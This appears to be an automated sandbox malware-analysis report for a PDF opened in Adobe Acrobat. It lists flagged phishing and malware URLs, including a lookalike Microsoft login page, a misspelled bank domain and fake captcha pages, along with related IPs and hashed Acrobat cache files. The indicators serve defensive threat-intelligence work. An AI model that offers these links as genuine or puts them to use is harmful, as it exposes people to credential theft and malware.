                                                        https://login.ecoleterradeasltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725581254870614.NzQzNDkzODMtOTc3Ni00MTk4LWEyOTgtNzcxOTE2NjUxYzRiMGVmZDU5N2MtN2U3NC00YjUwLTkxMzUtNTE5MGUwYzg1ZmQ2&ui_locales=en-US&mkt=en-US&client-request-id=36d4a1f6-7cba-45d1-a3ed-df92000d1eff&state=HfQ7BQGkYjqSuhdp0uw1pmK7OnWuMWuL6CrtRUQFTAqayUvi4HK2WHpRg3qXyBpviEzEkkPrHxRuxUPhbVJ6VT_z1Q4rknsdO1I1G8I0vvmCJKY1Jj17UvvXfl7rwwbByhZiSjZv4e0zjm8vBEwSjLmzdF29N_NteyY8M7drEpkBEAgCB0EoFXswqlG9707goDIQqjTpA0BHvdohyO5aj-tJFO1J-Wz2owkKr6bkCNZlxKE53oI2XKYpyD1GEC2x5jHgmT1f4Yrr9BPkhEeMCw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Get hashmaliciousUnknownBrowse
                                                          DEEZI80S.pdfGet hashmaliciousUnknownBrowse
                                                            https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                              firstontario.docxGet hashmaliciousUnknownBrowse
                                                                https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                                                  https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''Get hashmaliciousUnknownBrowse
                                                                    ACH REMITTANCE DOCUMENT 15.01.25.xlsbGet hashmaliciousUnknownBrowse
                                                                      https://tinyurl.com/AmconconstructionGet hashmaliciousUnknownBrowse
                                                                        Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                                                                          188.119.66.154DEEZI80S.pdfGet hashmaliciousUnknownBrowse
                                                                            https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                                                              r#U0435d.pdfGet hashmaliciousUnknownBrowse
                                                                                https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926eGet hashmaliciousUnknownBrowse
                                                                                  5diately.msgGet hashmaliciousUnknownBrowse
                                                                                    https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eip&ts=67645d30Get hashmaliciousUnknownBrowse
                                                                                      https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eil&ts=67645d30Get hashmaliciousUnknownBrowse
                                                                                        https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                                                          https://drive.google.com/file/d/11kk4glvCJRDeJ3XhdemRR_FFW8tGlSei/view?usp=sharing_eip&ts=67364a0bGet hashmaliciousUnknownBrowse
                                                                                            https://onlinefeature.blob.core.windows.net/plus/online.html?jd6123Get hashmaliciousUnknownBrowse
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              online.access.secure.bankofamerlica.comDEEZI80S.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 188.119.66.154
                                                                                              bg.microsoft.map.fastly.netOrder.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Order.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                                                                                              • 199.232.214.172
                                                                                              ACH REMITTANCE DOCUMENT 15.01.25.xlsbGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              Personliche Nachricht fur e4060738.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              Sample1.exeGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              alN48K3xcD.dllGet hashmaliciousWannacryBrowse
                                                                                              • 199.232.214.172
                                                                                              RFQ # PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              21033090848109083.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                              • 199.232.210.172
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              FLYNETRUDEEZI80S.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 188.119.66.154
                                                                                              https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                                                                              • 188.119.66.154
                                                                                              r#U0435d.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 188.119.66.154
                                                                                              https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926eGet hashmaliciousUnknownBrowse
                                                                                              • 188.119.66.154
                                                                                              5diately.msgGet hashmaliciousUnknownBrowse
                                                                                              • 188.119.66.154
                                                                                              EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                              • 188.119.66.185
                                                                                              EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                              • 188.119.66.185
                                                                                              vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                              • 188.119.66.185
                                                                                              vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                              • 188.119.66.185
                                                                                              r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                              • 188.119.66.185
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):290
                                                                                              Entropy (8bit):5.1130394825912315
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:iOwyNLSB+q2PRN2nKuAl9OmbnIFUtiyNLTPWZmwkyNLTKVkwORN2nKuAl9OmbjLJ:7wRB+vaHAahFUtiiW/khV5JHAaSJ
                                                                                              MD5:D8EF12FC3C1E18851986755790A3FEFF
                                                                                              SHA1:5C78EAF8B8504160BC42108AE4A04A43D38883E3
                                                                                              SHA-256:588D71C0C13DC997158CDD58F89A3D8DB457402F93FE21AC56D267C341CDBF2E
                                                                                              SHA-512:9F6A8B5EF73DA98970DB0D9639253B2E4D0A84356BC1F03392B66882FC084BCC43DDE86A5BC92396A8BAE70F1BC0C7B1B518A8F0F13839E357C7E83C87B8D90F
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:2025/01/15-13:41:19.500 1acc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-13:41:19.502 1acc Recovering log #3.2025/01/15-13:41:19.502 1acc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):290
                                                                                              Entropy (8bit):5.1130394825912315
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:iOwyNLSB+q2PRN2nKuAl9OmbnIFUtiyNLTPWZmwkyNLTKVkwORN2nKuAl9OmbjLJ:7wRB+vaHAahFUtiiW/khV5JHAaSJ
                                                                                              MD5:D8EF12FC3C1E18851986755790A3FEFF
                                                                                              SHA1:5C78EAF8B8504160BC42108AE4A04A43D38883E3
                                                                                              SHA-256:588D71C0C13DC997158CDD58F89A3D8DB457402F93FE21AC56D267C341CDBF2E
                                                                                              SHA-512:9F6A8B5EF73DA98970DB0D9639253B2E4D0A84356BC1F03392B66882FC084BCC43DDE86A5BC92396A8BAE70F1BC0C7B1B518A8F0F13839E357C7E83C87B8D90F
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:2025/01/15-13:41:19.500 1acc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-13:41:19.502 1acc Recovering log #3.2025/01/15-13:41:19.502 1acc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):334
                                                                                              Entropy (8bit):5.124886240065493
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:iOwyNLp/q2PRN2nKuAl9Ombzo2jMGIFUtiyNL9IWhZmwkyNL8VFkwORN2nKuAl97:7wo/vaHAa8uFUtiUh/kB75JHAa8RJ
                                                                                              MD5:799A479F2F1D664871F107E76C445500
                                                                                              SHA1:BFA8EF4DF501211DF906068BDD667B680250DC92
                                                                                              SHA-256:FED7CDF93AA333C77FABE6B19A49A35AB157F8C2EA02DAE808DAC153473E9CF8
                                                                                              SHA-512:4CBBACC7730C3686F22D6A2421C0B91AFD91F8A13AD55CA2878A7D279787E5F3332AAC8C36DC0204162A969B2FD205CC602C636643C56269D09E13FBC648325F
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:2025/01/15-13:41:19.401 1b30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/15-13:41:19.404 1b30 Recovering log #3.2025/01/15-13:41:19.405 1b30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):334
                                                                                              Entropy (8bit):5.124886240065493
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:iOwyNLp/q2PRN2nKuAl9Ombzo2jMGIFUtiyNL9IWhZmwkyNL8VFkwORN2nKuAl97:7wo/vaHAa8uFUtiUh/kB75JHAa8RJ
                                                                                              MD5:799A479F2F1D664871F107E76C445500
                                                                                              SHA1:BFA8EF4DF501211DF906068BDD667B680250DC92
                                                                                              SHA-256:FED7CDF93AA333C77FABE6B19A49A35AB157F8C2EA02DAE808DAC153473E9CF8
                                                                                              SHA-512:4CBBACC7730C3686F22D6A2421C0B91AFD91F8A13AD55CA2878A7D279787E5F3332AAC8C36DC0204162A969B2FD205CC602C636643C56269D09E13FBC648325F
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:2025/01/15-13:41:19.401 1b30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/15-13:41:19.404 1b30 Recovering log #3.2025/01/15-13:41:19.405 1b30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):403
                                                                                              Entropy (8bit):4.953858338552356
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                              MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                              SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                              SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                              SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):403
                                                                                              Entropy (8bit):4.953858338552356
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                              MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                              SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                              SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                              SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                              Malicious:false
                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):4099
                                                                                              Entropy (8bit):5.226039536472899
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xeih6IU:OLT0bTIeYa51Ogu/0OZARBT8kN88IzU
                                                                                              MD5:CB5D9BD7F79C5AF63EADFE6D37AEBAC8
                                                                                              SHA1:1E18DDE2189E1CAC1D9182F39C8F95EDF1499BB7
                                                                                              SHA-256:84FE3F6B64BB9889D3F1D2002EC73F14B655AA7439CA0DF10BCD29987D4F784F
                                                                                              SHA-512:A78D60C8514026FC74080200D31D3FBD2661F6271F0304C8234B432EE6A8D2454CE18D25E987E4706EDD9BFA0351FB01253D6F4EA619C75484B40C4B4FF24801
                                                                                              Malicious:false
                                                                                              Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):322
                                                                                              Entropy (8bit):5.183285425751763
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:iOwyNLp2Aq2PRN2nKuAl9OmbzNMxIFUtiyNL+ZmwkyNLgkwORN2nKuAl9OmbzNMT:7wuvaHAa8jFUtiB/kR5JHAa84J
                                                                                              MD5:CF928B72756253828C36E460ABF80A77
                                                                                              SHA1:A24B61F9423F888B5A7A84C6AB90B75314C21FE4
                                                                                              SHA-256:469511ED56DBF1B3F5A6F651B5D7E24572CA63548F07FF28900E9DA6669A6CEE
                                                                                              SHA-512:3E2F12B0F28872C7B290A954A4CFE0FA19ED9C4D24AC0E408D7F10780B4FA0FC6A1395124A6505C3A7672F0B266423CE15300DB31E2123862FC41C9AB5F8BC4C
                                                                                              Malicious:false
                                                                                              Preview:2025/01/15-13:41:19.544 1b30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/15-13:41:19.546 1b30 Recovering log #3.2025/01/15-13:41:19.548 1b30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):322
                                                                                              Entropy (8bit):5.183285425751763
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:iOwyNLp2Aq2PRN2nKuAl9OmbzNMxIFUtiyNL+ZmwkyNLgkwORN2nKuAl9OmbzNMT:7wuvaHAa8jFUtiB/kR5JHAa84J
                                                                                              MD5:CF928B72756253828C36E460ABF80A77
                                                                                              SHA1:A24B61F9423F888B5A7A84C6AB90B75314C21FE4
                                                                                              SHA-256:469511ED56DBF1B3F5A6F651B5D7E24572CA63548F07FF28900E9DA6669A6CEE
                                                                                              SHA-512:3E2F12B0F28872C7B290A954A4CFE0FA19ED9C4D24AC0E408D7F10780B4FA0FC6A1395124A6505C3A7672F0B266423CE15300DB31E2123862FC41C9AB5F8BC4C
                                                                                              Malicious:false
                                                                                              Preview:2025/01/15-13:41:19.544 1b30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/15-13:41:19.546 1b30 Recovering log #3.2025/01/15-13:41:19.548 1b30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:PC bitmap, Windows 3.x format, 164 x -92 x 32, cbSize 60406, bits offset 54
                                                                                              Category:dropped
                                                                                              Size (bytes):60406
                                                                                              Entropy (8bit):0.9629039620262114
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:Q5yO6s7CcJcxYm3GKjFwf3Qcoadx/KnTKwiVy8xhzEeg:oGEcJ3GKxwfQtrgc8xhzw
                                                                                              MD5:959CE7DA6EE6CE9C3948F06A48388CD9
                                                                                              SHA1:736E18773ECB62BF229971D8F7C9563098E90055
                                                                                              SHA-256:03359F0845A61227075B47A1E529837EFF46897C0961CAC98EC869685B164D1D
                                                                                              SHA-512:EFAE964D9FC13948BF77CA5C66E6DEA8E84CD7516FC917506177E92548BDF076CF7B5B5BFB1D3BCD252BD9674CE899B023F640E630D6B530965B909F0AEA9AC3
                                                                                              Malicious:false
                                                                                              Preview:BM........6...(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):57344
                                                                                              Entropy (8bit):3.291927920232006
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                                              MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                                              SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                                              SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                                              SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:SQLite Rollback Journal
                                                                                              Category:dropped
                                                                                              Size (bytes):16928
                                                                                              Entropy (8bit):1.214057457571945
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:7+tUjqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzm+Zd:7MsqLmFTIF3XmHjBoGGR+jMz+LhY
                                                                                              MD5:745C28C571D8219D211023AC89F31643
                                                                                              SHA1:2E515843572DFDD0DB11755CC6A2EFEA8F5E9094
                                                                                              SHA-256:D34563A016034DD22F1F1A86803EB1D0874BB6EEA2CF254046F18A7BB29D8AAD
                                                                                              SHA-512:8EE3357FD58830FA3885C5A81E89CBE7AFC0F7E254E43F64BE235BE4C6E69E78A4D4C42ECFF12C17879EE36B418DCD67501CCF2FA831C8AB703D7364DF9EC938
                                                                                              Malicious:false
                                                                                              Preview:.... .c.....YF^.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:Certificate, Version=3
                                                                                              Category:dropped
                                                                                              Size (bytes):1391
                                                                                              Entropy (8bit):7.705940075877404
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                              Malicious:false
                                                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):71954
                                                                                              Entropy (8bit):7.996617769952133
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                              Malicious:false
                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):192
                                                                                              Entropy (8bit):2.756901573172974
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:kkFklTkA+kfllXlE/HT8kull7llXNNX8RolJuRdxLlGB9lQRYwpDdt:kK/pT8Jl7NMa8RdWBwRd
                                                                                              MD5:02DBF1823E231801ED54F0F247CBEC0E
                                                                                              SHA1:0229135857D8A5907090217700996F3C4AA897DE
                                                                                              SHA-256:BF2B54392DF7F09CB90029D4BC7C32AB77A7C625C3182448F206241215349350
                                                                                              SHA-512:373DBD39E6862F0E35EF6377152478085F500FBF7B6EC022702DEF2AC9CAAF6919CD73C690D22B003C82CCDADB143F30FE80F7BF4B9B64A2CE6E4AC5285C4DFB
                                                                                              Malicious:false
                                                                                              Preview:p...... .........A.!}g..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):328
                                                                                              Entropy (8bit):3.2539954282295116
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKZXT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:xqDImsLNkPlE99SNxAhUe/3
                                                                                              MD5:57DE443E3A75983D811800532B8E23C3
                                                                                              SHA1:E3AC5F39243C323C0E378EF9C23584BF0E1F8321
                                                                                              SHA-256:BC5DD2E685B9FF14D4C156C00B346CC7E6A79F06F83E5A63898FD6A6562961D4
                                                                                              SHA-512:31922E2851D680FA2F9286E714DB65FAC1E3AD7E410156B60FD7E974FD189AC2413B1AB1FE1F1A9EDB87BA0AD5FD04BFA16E2AB4565E35AE74B7C5203998E554
                                                                                              Malicious:false
                                                                                              Preview:p...... ........q.JF}g..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
